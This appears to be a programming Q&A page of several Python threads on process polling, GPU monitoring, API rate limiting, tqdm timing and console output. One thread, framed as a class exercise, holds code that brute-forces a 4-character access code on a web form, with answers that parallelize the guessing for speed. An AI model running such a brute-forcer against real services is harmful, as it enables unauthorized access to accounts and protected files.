Check every X milliseconds if a process/application is running on Windows - Python

I want to check every 500 milliseconds whether a process/application is running (Windows 10). The code should be fast and resource-efficient!
This is my code, but how do I build the 500-millisecond interval in? Is psutil the fastest and best way? Thank you.
import psutil

for p in psutil.process_iter(attrs=['pid', 'name']):
    if "excel.exe" in (p.info['name']).lower():
        print("Application is running", (p.info['name']).lower())
    else:
        print("Application is not Running")

How about doing it like this:
import psutil
import time

def running(pname):
    pname = pname.lower()
    for p in psutil.process_iter(attrs=['name']):
        if pname in p.info['name'].lower():
            print(f'{pname} is running')
            return  # early return
    print(f'{pname} is not running')

while True:
    running('excel.exe')
    time.sleep(0.5)

First of all, psutil is a pretty good library. It has C bindings, so you won't be able to get much faster.
import psutil
import time

def print_app():
    present = False
    for p in psutil.process_iter(attrs=['pid', 'name']):
        if "excel.exe" in (p.info['name']).lower():
            present = True
    print(f"Application is {'' if present else 'not'} present")

start_time = time.time()
print_app()
print("--- %s seconds ---" % (time.time() - start_time))
This tells you how long one check takes: about 0.06 s for me.
If you want to execute it every 0.5 s, you can simply use time.sleep, because 0.5 >> 0.06.
You can then write this kind of code:
import psutil
import time

def print_app():
    present = False
    for p in psutil.process_iter(attrs=['pid', 'name']):
        if "excel.exe" in (p.info['name']).lower():
            present = True
    print(f"Application is {'' if present else 'not'} present")

while True:
    print_app()
    time.sleep(0.5)
PS: I changed your code so it checks whether your app is running without printing inside the loop. This makes the code faster because print takes a bit of time.
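If the half-second period should stay steady even though each scan itself takes a few tens of milliseconds, one small variation (just a sketch, not part of the answers above) is to subtract the scan time from the sleep:

import time
import psutil

def is_running(pname):
    pname = pname.lower()
    return any(pname in (p.info['name'] or '').lower()
               for p in psutil.process_iter(attrs=['name']))

INTERVAL = 0.5  # seconds
while True:
    started = time.monotonic()
    print("Application is running" if is_running("excel.exe") else "Application is not running")
    # Sleep only for whatever is left of the 500 ms window, so the scan time does not accumulate.
    time.sleep(max(0.0, INTERVAL - (time.monotonic() - started)))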

Related

How to get every second's GPU usage in Python

I have a model which runs on tensorflow-gpu, and my device is NVIDIA. I want to log every second's GPU usage so that I can measure the average/max GPU usage. I can do this manually by opening two terminals, one to run the model and another to measure with nvidia-smi -l 1. Of course, this is not a good way. I also tried to use a Thread to do it, here it is.
import subprocess as sp
import os
from threading import Thread

class MyThread(Thread):
    def __init__(self, func, args):
        super(MyThread, self).__init__()
        self.func = func
        self.args = args

    def run(self):
        self.result = self.func(*self.args)

    def get_result(self):
        return self.result

def get_gpu_memory():
    output_to_list = lambda x: x.decode('ascii').split('\n')[:-1]
    ACCEPTABLE_AVAILABLE_MEMORY = 1024
    COMMAND = "nvidia-smi -l 1 --query-gpu=memory.used --format=csv"
    memory_use_info = output_to_list(sp.check_output(COMMAND.split()))[1:]
    memory_use_values = [int(x.split()[0]) for i, x in enumerate(memory_use_info)]
    return memory_use_values

def run():
    pass

t1 = MyThread(run, args=())
t2 = MyThread(get_gpu_memory, args=())
t1.start()
t2.start()
t1.join()
t2.join()
res1 = t2.get_result()
However, this does not return every second's usage either. Is there a good solution?
In the command nvidia-smi -l 1 --query-gpu=memory.used --format=csv
the -l stands for:
-l, --loop= Probe until Ctrl+C at specified second interval.
So the command:
COMMAND = 'nvidia-smi -l 1 --query-gpu=memory.used --format=csv'
sp.check_output(COMMAND.split())
will never terminate and return.
It works if you move the looping out of the command (nvidia-smi) and into Python.
Here is the code:
import subprocess as sp
import os
from threading import Thread, Timer
import sched, time

def get_gpu_memory():
    output_to_list = lambda x: x.decode('ascii').split('\n')[:-1]
    ACCEPTABLE_AVAILABLE_MEMORY = 1024
    COMMAND = "nvidia-smi --query-gpu=memory.used --format=csv"
    try:
        memory_use_info = output_to_list(sp.check_output(COMMAND.split(), stderr=sp.STDOUT))[1:]
    except sp.CalledProcessError as e:
        raise RuntimeError("command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    memory_use_values = [int(x.split()[0]) for i, x in enumerate(memory_use_info)]
    # print(memory_use_values)
    return memory_use_values

def print_gpu_memory_every_5secs():
    """
    This function calls itself every 5 secs and prints the gpu_memory.
    """
    Timer(5.0, print_gpu_memory_every_5secs).start()
    print(get_gpu_memory())

print_gpu_memory_every_5secs()

"""
Do stuff.
"""
Here is a more rudimentary way of getting this output, but just as effective, and I think easier to understand. I added a small 10-value cache to get a good recent average and upped the check interval to every second. It outputs the average of the last 10 seconds and the current value each second, so operations that cause usage can be identified (which I think was the original question).
import subprocess as sp
import time

memory_total = 8192  # found with this command: nvidia-smi --query-gpu=memory.total --format=csv
memory_used_command = "nvidia-smi --query-gpu=memory.used --format=csv"
isolate_memory_value = lambda x: "".join(y for y in x.decode('ascii') if y in "0123456789")

def main():
    percentage_cache = []
    while True:
        memory_used = isolate_memory_value(sp.check_output(memory_used_command.split(), stderr=sp.STDOUT))
        percentage = float(memory_used) / float(memory_total) * 100
        percentage_cache.append(percentage)
        percentage_cache = percentage_cache[max(0, len(percentage_cache) - 10):]
        print("curr: " + str(percentage) + " %", "\navg: " + str(sum(percentage_cache) / len(percentage_cache))[:4] + " %\n")
        time.sleep(1)

main()
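As an alternative to shelling out to nvidia-smi at all, the same numbers can be read through the NVML bindings; a sketch, assuming the pynvml package is installed (pip install nvidia-ml-py3 or pynvml), not something from the answers above:

# pynvml talks to the same NVML library nvidia-smi uses, so no subprocess is needed.
import time
import pynvml

pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(0)  # first GPU
try:
    while True:
        mem = pynvml.nvmlDeviceGetMemoryInfo(handle)         # bytes
        util = pynvml.nvmlDeviceGetUtilizationRates(handle)  # percent
        print("memory: %.1f %%   gpu: %d %%" % (mem.used / mem.total * 100, util.gpu))
        time.sleep(1)
finally:
    pynvml.nvmlShutdown()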

Trying to add throttle control to paralleled API calls in python

I am using the Google Places API, which has a query-per-second limit of 10. This means I cannot make more than 10 requests within a second. If we were using serial execution this wouldn't be an issue, as the API's average response time is 250 ms, so I would only be able to make about 4 calls in a second.
To utilize the entire 10 QPS limit I used multithreading and made parallel API calls. But now I need to control the number of calls that can happen in a second; it should not go beyond 10 (the Google API starts throwing errors if I cross the limit).
Below is the code that I have so far. I am not able to figure out why the program just gets stuck sometimes, or takes a lot longer than required.
import time
from datetime import datetime
import random
from threading import Lock
from concurrent.futures import ThreadPoolExecutor as pool
import concurrent.futures
import requests
import matplotlib.pyplot as plt
from statistics import mean
from ratelimiter import RateLimiter

def make_parallel(func, qps=10):
    lock = Lock()
    threads_execution_que = []
    limit_hit = False

    def qps_manager(arg):
        current_second = time.time()
        lock.acquire()
        if len(threads_execution_que) >= qps or limit_hit:
            limit_hit = True
            if current_second - threads_execution_que[0] <= 1:
                time.sleep(current_second - threads_execution_que[0])
        current_time = time.time()
        threads_execution_que.append(current_time)
        lock.release()

        res = func(arg)

        lock.acquire()
        threads_execution_que.remove(current_time)
        lock.release()
        return res

    def wrapper(iterable, number_of_workers=12):
        result = []
        with pool(max_workers=number_of_workers) as executer:
            bag = {executer.submit(func, i): i for i in iterable}
            for future in concurrent.futures.as_completed(bag):
                result.append(future.result())
        return result

    return wrapper

@make_parallel
def api_call(i):
    min_func_time = random.uniform(.25, .3)
    start_time = time.time()
    try:
        response = requests.get('https://jsonplaceholder.typicode.com/posts', timeout=1)
    except Exception as e:
        response = e
    if (time.time() - start_time) - min_func_time < 0:
        time.sleep(min_func_time - (time.time() - start_time))
    return response

api_call([1]*50)
Ideally the code should take no more than about 1.5 seconds, but currently it is taking about 12-14 seconds.
The script speeds up to its expected speed as soon as I remove the QPS manager logic.
Please suggest what I am doing wrong, and also whether there is any package already available that provides this mechanism out of the box.
Looks like ratelimit does just that:
from ratelimit import limits, sleep_and_retry

@make_parallel
@sleep_and_retry
@limits(calls=10, period=1)
def api_call(i):
    try:
        response = requests.get("https://jsonplaceholder.typicode.com/posts", timeout=1)
    except Exception as e:
        response = e
    return response
EDIT: I did some testing and it looks like @sleep_and_retry is a little too optimistic, so just increase the period a little, to 1.2 seconds:
from datetime import datetime, timedelta

s = datetime.now()
api_call([1] * 50)
elapsed_time = datetime.now() - s
print(elapsed_time > timedelta(seconds=50 / 10))
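If you would rather not depend on an extra package, the same throttling can be done by hand with a lock and a deque of recent call timestamps. Here is a minimal sketch; the SlidingWindowLimiter class and its names are made up for illustration, not taken from either answer:

import time
import threading
from collections import deque
from concurrent.futures import ThreadPoolExecutor

import requests

class SlidingWindowLimiter:
    """Blocks a caller until fewer than max_calls have started in the last period seconds."""

    def __init__(self, max_calls=10, period=1.0):
        self.max_calls = max_calls
        self.period = period
        self.calls = deque()
        self.lock = threading.Lock()

    def acquire(self):
        while True:
            with self.lock:
                now = time.monotonic()
                # Drop timestamps that have left the window.
                while self.calls and now - self.calls[0] >= self.period:
                    self.calls.popleft()
                if len(self.calls) < self.max_calls:
                    self.calls.append(now)
                    return
                wait = self.period - (now - self.calls[0])
            time.sleep(wait)

limiter = SlidingWindowLimiter(max_calls=10, period=1.0)

def api_call(i):
    limiter.acquire()
    return requests.get("https://jsonplaceholder.typicode.com/posts", timeout=1)

with ThreadPoolExecutor(max_workers=12) as executor:
    results = list(executor.map(api_call, range(50)))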

tqdm: extract time passed + time remaining?

I have been going over the tqdm docs, but no matter where I look, I cannot find a method by which to extract the time passed and estimated time remaining fields (basically the center of the progress bar on each line: 00:00<00:02).
0%| | 0/200 [00:00<?, ?it/s]
4%|▎ | 7/200 [00:00<00:02, 68.64it/s]
8%|▊ | 16/200 [00:00<00:02, 72.87it/s]
12%|█▎ | 25/200 [00:00<00:02, 77.15it/s]
17%|█▋ | 34/200 [00:00<00:02, 79.79it/s]
22%|██▏ | 43/200 [00:00<00:01, 79.91it/s]
26%|██▌ | 52/200 [00:00<00:01, 80.23it/s]
30%|███ | 61/200 [00:00<00:01, 82.13it/s]
....
100%|██████████| 200/200 [00:02<00:00, 81.22it/s]
tqdm works by essentially printing a dynamic progress bar any time an update occurs, but is there a way to "just" get the 00:01 and 00:02 portions, so I could use them elsewhere in my Python program, such as in automatic stopping code that halts the process if it is taking too long?
tqdm objects expose some information via the public property format_dict.
from tqdm import tqdm

# for i in tqdm(iterable):
with tqdm(iterable) as t:
    for i in t:
        ...
        elapsed = t.format_dict['elapsed']
        elapsed_str = t.format_interval(elapsed)
Otherwise you could parse str(t).split()
You can get elapsed and remaining time from format_dict and some calculations.
t = tqdm(total=100)
...
elapsed = t.format_dict["elapsed"]
rate = t.format_dict["rate"]
remaining = (t.total - t.n) / rate if rate and t.total else 0  # seconds
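For example, those two values can drive a simple in-loop watchdog; a sketch using only the format_dict fields shown above (the 600-second budget is an arbitrary example value):

from tqdm import tqdm
import time

TIME_BUDGET = 600  # seconds; arbitrary example value

with tqdm(total=100) as t:
    for i in range(100):
        time.sleep(0.05)  # the real work
        t.update(1)
        rate = t.format_dict["rate"]
        elapsed = t.format_dict["elapsed"]
        remaining = (t.total - t.n) / rate if rate and t.total else 0
        if elapsed + remaining > TIME_BUDGET:
            raise TimeoutError("projected runtime exceeds the time budget")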
Here's the answer to the time remaining and time elapsed question:
from tqdm import tqdm
from time import sleep
with tqdm(total=100, bar_format="{l_bar}{bar} [ time left: {remaining}, time spent: {elapsed}]") as pbar:
    for i in range(100):  # `loop` in the original; any iterable matching `total`
        pbar.update(1)
        sleep(0.01)
If the values need to be used or printed elsewhere:
elapsed = pbar.format_dict["elapsed"]
rate = pbar.format_dict["rate"]
remains = (pbar.total - pbar.n) / rate if rate else 0  # remaining time is derived, not stored directly
Edit: see the library maintainer's answer above. Turns out, it is possible to get this information through the public API.
tqdm does not expose that information as part of its public API, and I don't recommend trying to hack your own into it. Then you would be depending on implementation details of tqdm that might change at any time.
However, that shouldn't stop you from writing your own. It's easy enough to instrument a loop with a timer, and you can then abort the loop if it takes too long. Here's a quick, rough example that still uses tqdm to provide visual feedback:
import time
from tqdm import tqdm

def long_running_function(n, timeout=5):
    start_time = time.time()
    for _ in tqdm(list(range(n))):
        time.sleep(1)  # doing some expensive work...
        elapsed_time = time.time() - start_time
        if elapsed_time > timeout:
            raise TimeoutError("long_running_function took too long!")

long_running_function(100, timeout=10)
If you run this, the function will stop its own execution after 10 seconds by raising an exception. You could catch this exception at the call site and respond to it in whatever way you deem appropriate.
If you want to be clever, you could even factor this out in a tqdm-like wrapper like this:
def timed_loop(iterator, timeout):
    start_time = time.time()
    iterator = iter(iterator)
    while True:
        elapsed_time = time.time() - start_time
        if elapsed_time > timeout:
            raise TimeoutError("long_running_function took too long!")
        try:
            yield next(iterator)
        except StopIteration:
            return  # the wrapped iterator is exhausted

def long_running_function(n, timeout=5):
    for _ in timed_loop(tqdm(list(range(n))), timeout=timeout):
        time.sleep(0.1)

long_running_function(100, timeout=5)

Slow brute force program in python

So here's the problem: our security teacher made a site that requires authentication and then asks for a code (4 characters) so that you can access a file. He told us to write a brute-force program in Python (any library we want) that can find the password. To do that, I first wanted to make a program that tries random combinations in that code field, just to get an idea of the time per request (I'm using the requests library), and the result was disappointing: each request takes around 8 seconds.
With some calculations: 36^4 = 1,679,616 possible combinations; at 8 seconds each that is 13,436,928 seconds, which would take my program around 155.52 days.
I would really appreciate it if anyone could help me make this faster. (He told us that it is possible to make around 1200 combinations per second.)
Here's my code:
import requests
import time
import random

def gen():
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    pw_length = 4
    mypw = ""
    for i in range(pw_length):
        next_index = random.randrange(len(alphabet))
        mypw = mypw + alphabet[next_index]
    return mypw

t0 = time.clock()
t1 = time.time()
cookie = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}

for i in range(0, 5):
    t2 = time.clock()
    t3 = time.time()
    values = {'RECALL': gen()}
    r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
    print("##################################")
    print("cpu time for req ", i, ":", time.clock() - t2)
    print("wall time for req ", i, ":", time.time() - t3)
    print("##################################")

print("##################################")
print("Total cpu time:", time.clock() - t0)
print("Total wall time:", time.time() - t1)
Thank you
One thing you could try is to use a Pool of workers to do multiple requests in parallel, passing a password to each worker. Something like:
import itertools
from multiprocessing import Pool

def pass_generator():
    for pass_tuple in itertools.product(alphabet, repeat=4):
        yield ''.join(pass_tuple)

def check_password(password):
    values = {'RECALL': password}
    r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
    # Check response here.

pool = Pool(processes=NUMBER_OF_PROCESSES)
pool.map(check_password, pass_generator())
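Since each attempt is dominated by network latency rather than CPU, threads with a reused HTTP connection (keep-alive) tend to help more than extra processes. Here is a sketch along those lines; the URL, cookie, and the success check are placeholders taken from the question, not a verified solution:

import itertools
import threading
from concurrent.futures import ThreadPoolExecutor

import requests

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
COOKIE = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}
thread_local = threading.local()

def session():
    # One Session per worker thread: keep-alive avoids a new TCP handshake per attempt.
    if not hasattr(thread_local, "s"):
        thread_local.s = requests.Session()
    return thread_local.s

def check_password(password):
    r = session().post('http://www.example.com/verif.php',
                       cookies=COOKIE, data={'RECALL': password})
    # Placeholder check: adapt to whatever the page returns for a correct code.
    return password if "access granted" in r.text.lower() else None

def batched(iterable, size):
    # Submit candidates in bounded batches so millions of futures are never queued at once.
    it = iter(iterable)
    while True:
        batch = list(itertools.islice(it, size))
        if not batch:
            return
        yield batch

candidates = (''.join(t) for t in itertools.product(ALPHABET, repeat=4))
with ThreadPoolExecutor(max_workers=50) as executor:
    for batch in batched(candidates, 1000):
        for hit in executor.map(check_password, batch):
            if hit:
                print("Found:", hit)
                raise SystemExit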

How can I clear a line in console after using \r and printing some text?

For my current project, there are some pieces of code that are slow and that I can't make faster. To get some feedback on how much has been done / still has to be done, I've created the progress snippet you can see below.
When you look at the last line
sys.stdout.write("\r100%" + " "*80 + "\n")
I use " "*80 to override eventually remaining characters. Is there a better way to clear the line?
(If you find the error in the calculation of the remaining time, I'd also be happy. But that's the question.)
Progress snippet
#!/usr/bin/env python
import time
import sys
import datetime

def some_slow_function():
    start_time = time.time()
    totalwork = 100
    for i in range(totalwork):
        # The slow part
        time.sleep(0.05)
        if i > 0:
            # Show how much work was done / how much work is remaining
            percentage_done = float(i) / totalwork
            current_running_time = time.time() - start_time
            remaining_seconds = current_running_time / percentage_done
            tmp = datetime.timedelta(seconds=remaining_seconds)
            sys.stdout.write("\r%0.2f%% (%s remaining)   " %
                             (percentage_done * 100, str(tmp)))
            sys.stdout.flush()
    sys.stdout.write("\r100%" + " " * 80 + "\n")
    sys.stdout.flush()

if __name__ == '__main__':
    some_slow_function()
Consoles
I use ZSH most of the time, sometimes bash (and I am always on a Linux system)
Try using the ANSI/vt100 "erase to end of line" escape sequence:
sys.stdout.write("\r100%\033[K\n")
Demonstration:
for i in range(4):
    sys.stdout.write("\r" + ("." * i * 10))
    sys.stdout.flush()
    if i == 3:
        sys.stdout.write("\rDone\033[K\n")
    time.sleep(1.5)
Reference: https://en.wikipedia.org/wiki/ANSI_escape_code#CSI_sequences
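If the escape code ends up being used in several places, it can be wrapped in a small helper; a sketch (print_status is a made-up name, not from the answer above):

import sys
import time

CLEAR_TO_EOL = "\033[K"  # ANSI/vt100 "erase to end of line"

def print_status(text, final=False):
    # \r moves the cursor to column 0; the escape code wipes whatever is left of the old line.
    sys.stdout.write("\r" + text + CLEAR_TO_EOL + ("\n" if final else ""))
    sys.stdout.flush()

for i in range(101):
    print_status("%3d%% complete" % i, final=(i == 100))
    time.sleep(0.02)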
This is what I use:
# Note: msvcrt is Windows-only, and this snippet is written for Python 2 (xrange).
from msvcrt import putch, getch

def putvalue(value):
    for c in str(value):
        putch(c)

def overwrite(value):
    """ Used to overwrite the current line in the command prompt,
    useful when displaying percent or progress """
    putvalue('\r' + str(value))

from time import sleep

for x in xrange(101):
    overwrite("Testing Overwrite.........%s%% complete" % x)
    sleep(.05)
